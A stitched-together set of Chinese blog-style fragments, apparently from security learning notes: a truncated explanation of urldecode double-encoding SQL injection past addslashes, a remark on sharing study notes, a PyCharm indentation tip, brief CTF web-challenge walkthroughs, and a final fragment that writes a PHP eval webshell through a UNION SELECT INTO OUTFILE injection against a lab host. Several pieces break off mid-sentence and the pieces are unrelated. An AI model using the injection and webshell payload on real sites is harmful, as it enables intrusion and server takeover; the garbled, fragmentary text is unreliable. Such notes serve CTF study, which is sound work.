urldecode二次注入相关知识点:大部分网站通常使用addslashes()、mysql_real_escape_string()、mysql_escape_string()函数或者开启GPC的方式来防止注入，如果某处使用了urldecode或者rawurldecode函数，则会导致二次解码生成单引号而引发注入。我们利用%2527 传入时自动解码一次编程%25,这时addslasher()等相

希望我们可以团结起来留下方式彼此交流，一起多分享输出，哪怕是没有什么结果的输出。#CTL{\n}自己经常坚持不下来去努力输出导致学了很多，不输出全忘了，原地踏步中。。

pycharm和idea 下的Python稍有出入pycharm中我从notebook复制，手动tab对齐，发现仍然提示缩进问题idea中复制之后，手动缩进就 不会出现建议，换软件,或者手打，我是把代码删除到了打开文件代码哪里手写就行

web1 右键查看源代码右键查看源码，即可发现web2 图片也可以存信息打开之后发现只有图片，我们右键保存到本地记事本打开，发现了flagweb3层层递进没啥思路，展开元素看看，发现了 隐藏网页，打开看看源码发现了flagweb4Not Foundweb5有页面看不出来web6 sql注入 $user = $_POST[user]; $pass = md5($_POST[pass]

sql注意拿到webshell进行一些基本操作得出绝对路径http://afsgr16-b1ferw.aqlab.cn/?id=4894写入一句话http://afsgr16-b1ferw.aqlab.cn/?id=4894 union select 1,’<?php @eval($_REQUEST[8])?>’ into outfile ‘c:/phpstudy/www/77582